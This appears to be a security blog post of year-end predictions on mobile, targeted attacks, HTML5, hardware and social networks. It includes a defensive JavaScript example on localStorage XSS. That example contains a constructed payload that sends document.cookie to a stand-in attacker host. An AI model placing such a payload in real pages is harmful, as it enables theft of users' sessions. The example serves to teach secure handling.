It’s the most wonderful time of the year. A time when we set aside our quarrels and show compassion for complete strangers, realize that it’s better to give than to receive and, in the security industry, let everyone know just how smart we are by playing Nostradamus. Yes, it wouldn’t be December if I didn’t join in the chorus of prognosticators to let you know exactly what is in store for us all in the coming twelve months.
Mobile
With WebOS now officially an orphan, Blackberry OS racing to the grave and Windows Mobile still trying to get ready for the party, the victors can be crowned: iOS and Android have won. The interesting part of the race is about to begin, namely who has the best security model. Will it be Apple’s draconian ‘we control everything’ or Google’s happy-go-lucky ‘come on in, everyone’s invited’ approach?
Prediction: The ‘don’t be evil’ company will struggle mightily to keep evil applications out of their App Marketplace. In an effort to avoid being to mobile what Windows is to PCs (a breeding ground for malware), Google will subtly make Android less open to both partners and developers. They will also announce an initiative to increase security screening of applications before they are published in the App Marketplace. Apple, on the other hand, will have comparatively few malicious apps to deal with, but at least three major OS flaws that impact all users (and make the jailbreak teams happy). Apple will address the vulnerabilities several days late and apologize to no one. iPad 3 and iPhone 5 sales will turn financial analysts into giddy schoolgirls.
Enterprise
Thanks to marketing teams across the globe, APT (Advanced Persistent Threat) has become a meaningless buzzword in the security lexicon. Let’s therefore ditch that term and instead focus on targeted attacks, specifically those aimed at enterprises with the goal of corporate espionage or inflicting financial damage. Many praised Google for coming forward in January 2010 to reveal that they and others had been the victims of a sophisticated targeted attack, likely originating from China. Many in the public mistakenly assumed that this was a new and previously unseen event on the security stage. What was new about it was the openness displayed by Google in discussing the situation, not the class of attack.
Prediction: The term ‘APT’ will go the way of ‘eCommerce’ and the Dodo bird, but stories of targeted attacks against enterprises will rise tenfold in the media. This will reflect both increased activity by attackers as they broaden their reach to smaller companies and decisions by corporate counsel to disclose details of an attack rather than suppress the information and risk litigation for covering up such activity.
Web
Want to know a secret for making security predictions? Take a look at what was being discussed at security conferences 2-3 years ago. At Black Hat DC 2009, I discussed the dangers of persistent web browser storage. One of the key technologies taking browser storage to the next level is HTML5. In 2009, HTML5 apps were few and far between. Thanks in large part to mobile browsers, HTML5 is now much more mainstream. As with any new technology, developers are quickly rushing to play with the new kid on the block and publishing their goods without taking the time to understand the security implications.
Prediction: We’ll see an increasing number of web application vulnerabilities in HTML5 apps, not because the technologies behind them are insecure, but because HTML5 is not well understood from a security perspective.
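As an added illustration of the kind of mistake behind that prediction (this is example code written for this page, not code from the original post), here is the trap that persistent storage sets: a value written to localStorage is read back on every later visit, so an application that trusts its own storage turns a one-time injection (a reflected XSS that has since been fixed, a malicious same-origin script, or another user of a shared machine) into a persistent one. The storage object below is an in-memory stand-in for window.localStorage so the snippet runs outside a browser; the key names and the payload are constructed for the example.

```javascript
// Added example: data read back from HTML5 persistent storage is untrusted input.
// Node has no window.localStorage, so a small in-memory object with the same
// getItem/setItem/removeItem/key/length shape stands in for it (assumption).
class MemoryStorage {
  constructor() { this.map = new Map(); }
  get length() { return this.map.size; }
  key(i) { return Array.from(this.map.keys())[i] ?? null; }
  getItem(k) { return this.map.has(k) ? this.map.get(k) : null; }
  setItem(k, v) { this.map.set(String(k), String(v)); }
  removeItem(k) { this.map.delete(k); }
}

// Constructed payload: what a single injection could leave behind in storage.
const CONSTRUCTED_PAYLOAD =
  'Bob<img src=x onerror="fetch(\'//attacker.invalid/?c=\'+document.cookie)">';

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable pattern: the app assumes storage holds only what it wrote and
// concatenates the value straight into markup (think `el.innerHTML = ...`).
// Because storage persists, the payload fires on every later visit, even after
// the injection point that planted it has been fixed.
function renderGreetingUnsafe(storage) {
  const name = storage.getItem('displayName') || 'guest';
  return '<h1>Welcome back, ' + name + '</h1>';
}

// Hardened pattern: validate the shape on read and encode on output, exactly
// as you would for a query parameter or a form field.
function renderGreetingSafe(storage) {
  const raw = storage.getItem('displayName');
  const ok = typeof raw === 'string' && raw.length > 0 && raw.length <= 40 &&
    /^[\p{L}\p{N} ._'-]+$/u.test(raw);
  const name = ok ? raw : 'guest';
  return '<h1>Welcome back, ' + escapeHtml(name) + '</h1>';
}

// Second implication: anything in localStorage is readable by any script that
// runs on the origin (there is no HttpOnly equivalent), so secrets do not
// belong there. This audit flags keys whose names suggest a secret.
const SECRET_KEY_PATTERN = /(token|session|secret|password|passwd|auth|jwt|api[-_]?key)/i;
function findSecretLookingKeys(storage) {
  const hits = [];
  for (let i = 0; i < storage.length; i++) {
    const k = storage.key(i);
    if (SECRET_KEY_PATTERN.test(k)) hits.push(k);
  }
  return hits;
}

// Walk through the scenario: one injection, then two later renders.
function demo() {
  const storage = new MemoryStorage();
  storage.setItem('displayName', CONSTRUCTED_PAYLOAD); // planted once
  storage.setItem('sessionToken', 'deadbeef');          // developer mistake
  return {
    unsafe: renderGreetingUnsafe(storage),   // payload survives into the page
    safe: renderGreetingSafe(storage),       // falls back to 'guest'
    secrets: findSecretLookingKeys(storage), // ['sessionToken']
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

The point of the hardened version is not the particular regex; it is that storage is handled with the same validate-on-read, encode-on-write discipline as any other untrusted input, and that session material stays in HttpOnly cookies rather than in script-readable storage.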
Hardware
Security in the hardware space is at least ten years behind security in the software industry. This isn’t so much a reflection of the good work being done in software as it is the reality of software vendors being forced to address an issue that was impacting business. Thanks to the efforts of many great researchers investing countless hours doing QA work that should have been done long before products hit the shelf, today most major software vendors have no choice but to employ security response teams and take vulnerability disclosure very seriously.
Hardware vendors simply haven’t faced the same scrutiny, but that’s changing. This year at Black Hat, I spoke about the sad state of embedded web servers, and recently researchers at Columbia University discussed the ability to remotely cause physical damage to HP printers due to security flaws.
Prediction: Hardware vendors will get a wake-up call as researchers shift their efforts and party like it’s 1999.
Social
The majority of malicious activity surrounding social networks today involves unwanted or nuisance traffic, as opposed to attacks that lead to a fully compromised machine. We’re seeing an increase in likejacking and self-inflicted JavaScript injection attacks that share the same overall goal: drive web traffic or prompt software downloads that earn the scammer a few cents per click.
Social networks such as Facebook are of value to more serious criminals, but mainly for reconnaissance during targeted attacks. They are a great resource for learning background information about an individual and uncovering relationships, all of which can be of great value for social engineering. We are not, however, commonly seeing the communication features of social networks used to deliver malicious payloads directly to victims, or investment in uncovering web application vulnerabilities that could be used to compromise end user machines rather than to spread the aforementioned scams.
Prediction: Attackers will raise the bar and leverage social networks for more sophisticated attacks, the goal of which will be full compromise as opposed to marketing financial scams.
Merry New Year!
- michael